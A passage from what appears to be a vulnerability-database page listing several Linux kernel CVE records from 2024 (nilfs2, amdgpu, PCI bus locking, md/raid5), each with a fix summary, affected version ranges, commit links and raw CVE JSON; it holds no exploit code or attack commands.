              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.322",
                  "versionStartIncluding": "2.6.33",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.284",
                  "versionStartIncluding": "2.6.33",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "2.6.33",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "2.6.33",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.110",
                  "versionStartIncluding": "2.6.33",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.51",
                  "versionStartIncluding": "2.6.33",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.10",
                  "versionStartIncluding": "2.6.33",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "2.6.33",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix state management in error path of log writing function\n\nAfter commit a694291a6211 (\"nilfs2: separate wait function from\nnilfs_segctor_write\") was applied, the log writing function\nnilfs_segctor_do_construct() was able to issue I/O requests continuously\neven if user data blocks were split into multiple logs across segments,\nbut two potential flaws were introduced in its error handling.\n\nFirst, if nilfs_segctor_begin_construction() fails while creating the\nsecond or subsequent logs, the log writing function returns without\ncalling nilfs_segctor_abort_construction(), so the writeback flag set on\npages/folios will remain uncleared.  This causes page cache operations to\nhang waiting for the writeback flag.  For example,\ntruncate_inode_pages_final(), which is called via nilfs_evict_inode() when\nan inode is evicted from memory, will hang.\n\nSecond, the NILFS_I_COLLECTED flag set on normal inodes remain uncleared. \nAs a result, if the next log write involves checkpoint creation, that\u0027s\nfine, but if a partial log write is performed that does not, inodes with\nNILFS_I_COLLECTED set are erroneously removed from the \"sc_dirty_files\"\nlist, and their data and b-tree blocks may not be written to the device,\ncorrupting the block mapping.\n\nFix these issues by uniformly calling nilfs_segctor_abort_construction()\non failure of each step in the loop in nilfs_segctor_do_construct(),\nhaving it clean up logs and segment usages according to progress, and\ncorrecting the conditions for calling nilfs_redirty_inodes() to ensure\nthat the NILFS_I_COLLECTED flag is cleared."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:36:50.353Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/40a2757de2c376ef8a08d9ee9c81e77f3c750adf"
        },
        {
          "url": "https://git.kernel.org/stable/c/036441e8438b29111fa75008f0ce305fb4e83c0a"
        },
        {
          "url": "https://git.kernel.org/stable/c/efdde00d4a1ef10bb71e09ebc67823a3d3ad725b"
        },
        {
          "url": "https://git.kernel.org/stable/c/3e349d7191f0688fc9808ef24fd4e4b4ef5ca876"
        },
        {
          "url": "https://git.kernel.org/stable/c/30562eff4a6dd35c4b5be9699ef61ad9f5f20a06"
        },
        {
          "url": "https://git.kernel.org/stable/c/0a1a961bde4351dc047ffdeb2f1311ca16a700cc"
        },
        {
          "url": "https://git.kernel.org/stable/c/74866c16ea2183f52925fa5d76061a1fe7f7737b"
        },
        {
          "url": "https://git.kernel.org/stable/c/6576dd6695f2afca3f4954029ac4a64f82ba60ab"
        }
      ],
      "title": "nilfs2: fix state management in error path of log writing function",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-47669",
    "datePublished": "2024-10-09T14:14:01.139Z",
    "dateReserved": "2024-09-30T16:00:12.936Z",
    "dateUpdated": "2025-11-03T22:20:34.709Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46805 (GCVE-0-2024-46805)

Vulnerability from cvelistv5 – Published: 2024-09-27 12:35 – Updated: 2025-11-03 22:18

Title

drm/amdgpu: fix the waring dereferencing hive

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix the waring dereferencing hive Check the amdgpu_hive_info *hive that maybe is NULL.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f20d1d5cbb39802f6…
	https://git.kernel.org/stable/c/01cd55b971131b07b…
	https://git.kernel.org/stable/c/4ab720b6aa1ef5e71…
	https://git.kernel.org/stable/c/d3f927ef0607b3c8c…
	https://git.kernel.org/stable/c/1940708ccf5aff76d…

Impacted products

Vendor

Product

Version

Linux

Affected: 44357a1bd5f5a1012024a127a4653c2dfa4af18a , < f20d1d5cbb39802f68be24458861094f3e66f356 (git)
Affected: 44357a1bd5f5a1012024a127a4653c2dfa4af18a , < 01cd55b971131b07b7ff8d622fa93bb4f8be07df (git)
Affected: 44357a1bd5f5a1012024a127a4653c2dfa4af18a , < 4ab720b6aa1ef5e71db1e534b5b45c80ac4ec58a (git)
Affected: 44357a1bd5f5a1012024a127a4653c2dfa4af18a , < d3f927ef0607b3c8c3f79ab6d9a4ebead3e35f4c (git)
Affected: 44357a1bd5f5a1012024a127a4653c2dfa4af18a , < 1940708ccf5aff76de4e0b399f99267c93a89193 (git)

Linux

Affected: 5.15
Unaffected: 0 , < 5.15 (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.109 , ≤ 6.1.* (semver)
Unaffected: 6.6.50 , ≤ 6.6.* (semver)
Unaffected: 6.10.9 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46805",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:20:26.907540Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:20:38.198Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:18:49.043Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f20d1d5cbb39802f68be24458861094f3e66f356",
              "status": "affected",
              "version": "44357a1bd5f5a1012024a127a4653c2dfa4af18a",
              "versionType": "git"
            },
            {
              "lessThan": "01cd55b971131b07b7ff8d622fa93bb4f8be07df",
              "status": "affected",
              "version": "44357a1bd5f5a1012024a127a4653c2dfa4af18a",
              "versionType": "git"
            },
            {
              "lessThan": "4ab720b6aa1ef5e71db1e534b5b45c80ac4ec58a",
              "status": "affected",
              "version": "44357a1bd5f5a1012024a127a4653c2dfa4af18a",
              "versionType": "git"
            },
            {
              "lessThan": "d3f927ef0607b3c8c3f79ab6d9a4ebead3e35f4c",
              "status": "affected",
              "version": "44357a1bd5f5a1012024a127a4653c2dfa4af18a",
              "versionType": "git"
            },
            {
              "lessThan": "1940708ccf5aff76de4e0b399f99267c93a89193",
              "status": "affected",
              "version": "44357a1bd5f5a1012024a127a4653c2dfa4af18a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.15"
            },
            {
              "lessThan": "5.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.109",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.50",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.109",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.50",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.9",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: fix the waring dereferencing hive\n\nCheck the amdgpu_hive_info *hive that maybe is NULL."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-03T12:59:14.029Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f20d1d5cbb39802f68be24458861094f3e66f356"
        },
        {
          "url": "https://git.kernel.org/stable/c/01cd55b971131b07b7ff8d622fa93bb4f8be07df"
        },
        {
          "url": "https://git.kernel.org/stable/c/4ab720b6aa1ef5e71db1e534b5b45c80ac4ec58a"
        },
        {
          "url": "https://git.kernel.org/stable/c/d3f927ef0607b3c8c3f79ab6d9a4ebead3e35f4c"
        },
        {
          "url": "https://git.kernel.org/stable/c/1940708ccf5aff76de4e0b399f99267c93a89193"
        }
      ],
      "title": "drm/amdgpu: fix the waring dereferencing hive",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46805",
    "datePublished": "2024-09-27T12:35:50.483Z",
    "dateReserved": "2024-09-11T15:12:18.281Z",
    "dateUpdated": "2025-11-03T22:18:49.043Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46750 (GCVE-0-2024-46750)

Vulnerability from cvelistv5 – Published: 2024-09-18 07:12 – Updated: 2026-01-05 10:53

Title

PCI: Add missing bridge lock to pci_bus_lock()

Summary

In the Linux kernel, the following vulnerability has been resolved: PCI: Add missing bridge lock to pci_bus_lock() One of the true positives that the cfg_access_lock lockdep effort identified is this sequence: WARNING: CPU: 14 PID: 1 at drivers/pci/pci.c:4886 pci_bridge_secondary_bus_reset+0x5d/0x70 RIP: 0010:pci_bridge_secondary_bus_reset+0x5d/0x70 Call Trace: <TASK> ? __warn+0x8c/0x190 ? pci_bridge_secondary_bus_reset+0x5d/0x70 ? report_bug+0x1f8/0x200 ? handle_bug+0x3c/0x70 ? exc_invalid_op+0x18/0x70 ? asm_exc_invalid_op+0x1a/0x20 ? pci_bridge_secondary_bus_reset+0x5d/0x70 pci_reset_bus+0x1d8/0x270 vmd_probe+0x778/0xa10 pci_device_probe+0x95/0x120 Where pci_reset_bus() users are triggering unlocked secondary bus resets. Ironically pci_bus_reset(), several calls down from pci_reset_bus(), uses pci_bus_lock() before issuing the reset which locks everything *but* the bridge itself. For the same motivation as adding: bridge = pci_upstream_bridge(dev); if (bridge) pci_dev_lock(bridge); to pci_reset_function() for the "bus" and "cxl_bus" reset cases, add pci_dev_lock() for @bus->self to pci_bus_lock(). [bhelgaas: squash in recursive locking deadlock fix from Keith Busch: https://lore.kernel.org/r/20240711193650.701834-1-kbusch@meta.com]

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/0790b89c7e911003b…
	https://git.kernel.org/stable/c/df77a678c33871a6e…
	https://git.kernel.org/stable/c/e2355d513b89a2cb5…
	https://git.kernel.org/stable/c/04e85a3285b0e5c5a…
	https://git.kernel.org/stable/c/7253b4fed46471cc2…
	https://git.kernel.org/stable/c/78c6e39fef5c42896…
	https://git.kernel.org/stable/c/81c68e218ab883dfa…
	https://git.kernel.org/stable/c/a4e772898f8bf2e7e…

Impacted products

Vendor

Product

Version

Linux

Affected: 090a3c5322e900f468b3205b76d0837003ad57b2 , < 0790b89c7e911003b8c50ae50e3ac7645de1fae9 (git)
Affected: 090a3c5322e900f468b3205b76d0837003ad57b2 , < df77a678c33871a6e4ac5b54a71662f1d702335b (git)
Affected: 090a3c5322e900f468b3205b76d0837003ad57b2 , < e2355d513b89a2cb511b4ded0deb426cdb01acd0 (git)
Affected: 090a3c5322e900f468b3205b76d0837003ad57b2 , < 04e85a3285b0e5c5af6fd2c0fd6e95ffecc01945 (git)
Affected: 090a3c5322e900f468b3205b76d0837003ad57b2 , < 7253b4fed46471cc247c6cacefac890a8472c083 (git)
Affected: 090a3c5322e900f468b3205b76d0837003ad57b2 , < 78c6e39fef5c428960aff742149bba302dd46f5a (git)
Affected: 090a3c5322e900f468b3205b76d0837003ad57b2 , < 81c68e218ab883dfa368460a59b674084c0240da (git)
Affected: 090a3c5322e900f468b3205b76d0837003ad57b2 , < a4e772898f8bf2e7e1cf661a12c60a5612c4afab (git)

Linux

Affected: 3.12
Unaffected: 0 , < 3.12 (semver)
Unaffected: 4.19.322 , ≤ 4.19.* (semver)
Unaffected: 5.4.284 , ≤ 5.4.* (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.110 , ≤ 6.1.* (semver)
Unaffected: 6.6.51 , ≤ 6.6.* (semver)
Unaffected: 6.10.10 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46750",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:47:52.159037Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:48:07.141Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:17:46.292Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/pci/pci.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "0790b89c7e911003b8c50ae50e3ac7645de1fae9",
              "status": "affected",
              "version": "090a3c5322e900f468b3205b76d0837003ad57b2",
              "versionType": "git"
            },
            {
              "lessThan": "df77a678c33871a6e4ac5b54a71662f1d702335b",
              "status": "affected",
              "version": "090a3c5322e900f468b3205b76d0837003ad57b2",
              "versionType": "git"
            },
            {
              "lessThan": "e2355d513b89a2cb511b4ded0deb426cdb01acd0",
              "status": "affected",
              "version": "090a3c5322e900f468b3205b76d0837003ad57b2",
              "versionType": "git"
            },
            {
              "lessThan": "04e85a3285b0e5c5af6fd2c0fd6e95ffecc01945",
              "status": "affected",
              "version": "090a3c5322e900f468b3205b76d0837003ad57b2",
              "versionType": "git"
            },
            {
              "lessThan": "7253b4fed46471cc247c6cacefac890a8472c083",
              "status": "affected",
              "version": "090a3c5322e900f468b3205b76d0837003ad57b2",
              "versionType": "git"
            },
            {
              "lessThan": "78c6e39fef5c428960aff742149bba302dd46f5a",
              "status": "affected",
              "version": "090a3c5322e900f468b3205b76d0837003ad57b2",
              "versionType": "git"
            },
            {
              "lessThan": "81c68e218ab883dfa368460a59b674084c0240da",
              "status": "affected",
              "version": "090a3c5322e900f468b3205b76d0837003ad57b2",
              "versionType": "git"
            },
            {
              "lessThan": "a4e772898f8bf2e7e1cf661a12c60a5612c4afab",
              "status": "affected",
              "version": "090a3c5322e900f468b3205b76d0837003ad57b2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/pci/pci.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.12"
            },
            {
              "lessThan": "3.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.322",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.284",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.110",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.51",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.322",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.284",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.110",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.51",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.10",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI: Add missing bridge lock to pci_bus_lock()\n\nOne of the true positives that the cfg_access_lock lockdep effort\nidentified is this sequence:\n\n  WARNING: CPU: 14 PID: 1 at drivers/pci/pci.c:4886 pci_bridge_secondary_bus_reset+0x5d/0x70\n  RIP: 0010:pci_bridge_secondary_bus_reset+0x5d/0x70\n  Call Trace:\n   \u003cTASK\u003e\n   ? __warn+0x8c/0x190\n   ? pci_bridge_secondary_bus_reset+0x5d/0x70\n   ? report_bug+0x1f8/0x200\n   ? handle_bug+0x3c/0x70\n   ? exc_invalid_op+0x18/0x70\n   ? asm_exc_invalid_op+0x1a/0x20\n   ? pci_bridge_secondary_bus_reset+0x5d/0x70\n   pci_reset_bus+0x1d8/0x270\n   vmd_probe+0x778/0xa10\n   pci_device_probe+0x95/0x120\n\nWhere pci_reset_bus() users are triggering unlocked secondary bus resets.\nIronically pci_bus_reset(), several calls down from pci_reset_bus(), uses\npci_bus_lock() before issuing the reset which locks everything *but* the\nbridge itself.\n\nFor the same motivation as adding:\n\n  bridge = pci_upstream_bridge(dev);\n  if (bridge)\n    pci_dev_lock(bridge);\n\nto pci_reset_function() for the \"bus\" and \"cxl_bus\" reset cases, add\npci_dev_lock() for @bus-\u003eself to pci_bus_lock().\n\n[bhelgaas: squash in recursive locking deadlock fix from Keith Busch:\nhttps://lore.kernel.org/r/20240711193650.701834-1-kbusch@meta.com]"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:53:06.162Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/0790b89c7e911003b8c50ae50e3ac7645de1fae9"
        },
        {
          "url": "https://git.kernel.org/stable/c/df77a678c33871a6e4ac5b54a71662f1d702335b"
        },
        {
          "url": "https://git.kernel.org/stable/c/e2355d513b89a2cb511b4ded0deb426cdb01acd0"
        },
        {
          "url": "https://git.kernel.org/stable/c/04e85a3285b0e5c5af6fd2c0fd6e95ffecc01945"
        },
        {
          "url": "https://git.kernel.org/stable/c/7253b4fed46471cc247c6cacefac890a8472c083"
        },
        {
          "url": "https://git.kernel.org/stable/c/78c6e39fef5c428960aff742149bba302dd46f5a"
        },
        {
          "url": "https://git.kernel.org/stable/c/81c68e218ab883dfa368460a59b674084c0240da"
        },
        {
          "url": "https://git.kernel.org/stable/c/a4e772898f8bf2e7e1cf661a12c60a5612c4afab"
        }
      ],
      "title": "PCI: Add missing bridge lock to pci_bus_lock()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46750",
    "datePublished": "2024-09-18T07:12:10.484Z",
    "dateReserved": "2024-09-11T15:12:18.267Z",
    "dateUpdated": "2026-01-05T10:53:06.162Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-43914 (GCVE-0-2024-43914)

Vulnerability from cvelistv5 – Published: 2024-08-26 10:11 – Updated: 2026-01-05 10:52

Title

md/raid5: avoid BUG_ON() while continue reshape after reassembling

Summary

In the Linux kernel, the following vulnerability has been resolved: md/raid5: avoid BUG_ON() while continue reshape after reassembling Currently, mdadm support --revert-reshape to abort the reshape while reassembling, as the test 07revert-grow. However, following BUG_ON() can be triggerred by the test: kernel BUG at drivers/md/raid5.c:6278! invalid opcode: 0000 [#1] PREEMPT SMP PTI irq event stamp: 158985 CPU: 6 PID: 891 Comm: md0_reshape Not tainted 6.9.0-03335-g7592a0b0049a #94 RIP: 0010:reshape_request+0x3f1/0xe60 Call Trace: <TASK> raid5_sync_request+0x43d/0x550 md_do_sync+0xb7a/0x2110 md_thread+0x294/0x2b0 kthread+0x147/0x1c0 ret_from_fork+0x59/0x70 ret_from_fork_asm+0x1a/0x30 </TASK> Root cause is that --revert-reshape update the raid_disks from 5 to 4, while reshape position is still set, and after reassembling the array, reshape position will be read from super block, then during reshape the checking of 'writepos' that is caculated by old reshape position will fail. Fix this panic the easy way first, by converting the BUG_ON() to WARN_ON(), and stop the reshape if checkings fail. Noted that mdadm must fix --revert-shape as well, and probably md/raid should enhance metadata validation as well, however this means reassemble will fail and there must be user tools to fix the wrong metadata.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/2c92f8c1c456d556f…
	https://git.kernel.org/stable/c/6b33c468d543f6a83…
	https://git.kernel.org/stable/c/c384dd4f1fb3b14a2…
	https://git.kernel.org/stable/c/bf0ff69a42a3d2d46…
	https://git.kernel.org/stable/c/3b33740c1750a39e0…
	https://git.kernel.org/stable/c/775a9ba16c9ffe98f…
	https://git.kernel.org/stable/c/4811d6e5d9f4090c3…
	https://git.kernel.org/stable/c/305a5170dc5cf3d39…

Impacted products

Vendor

Product

Version

Linux

Affected: ec32a2bd35bd6b933a5db6542c48210ce069a376 , < 2c92f8c1c456d556f15cbf51667b385026b2e6a0 (git)
Affected: ec32a2bd35bd6b933a5db6542c48210ce069a376 , < 6b33c468d543f6a83de2d61f09fec74b27e19fd2 (git)
Affected: ec32a2bd35bd6b933a5db6542c48210ce069a376 , < c384dd4f1fb3b14a2fd199360701cc163ea88705 (git)
Affected: ec32a2bd35bd6b933a5db6542c48210ce069a376 , < bf0ff69a42a3d2d46876d0514ecf13dffc516666 (git)
Affected: ec32a2bd35bd6b933a5db6542c48210ce069a376 , < 3b33740c1750a39e046339ff9240e954f0156707 (git)
Affected: ec32a2bd35bd6b933a5db6542c48210ce069a376 , < 775a9ba16c9ffe98fe54ebf14e55d5660f2bf600 (git)
Affected: ec32a2bd35bd6b933a5db6542c48210ce069a376 , < 4811d6e5d9f4090c3e0ff9890eb24077108046ab (git)
Affected: ec32a2bd35bd6b933a5db6542c48210ce069a376 , < 305a5170dc5cf3d395bb4c4e9239bca6d0b54b49 (git)

Linux

Affected: 2.6.30
Unaffected: 0 , < 2.6.30 (semver)
Unaffected: 4.19.320 , ≤ 4.19.* (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.105 , ≤ 6.1.* (semver)
Unaffected: 6.6.46 , ≤ 6.6.* (semver)
Unaffected: 6.10.5 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-43914",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:28:04.371448Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:07.042Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:07:20.579Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
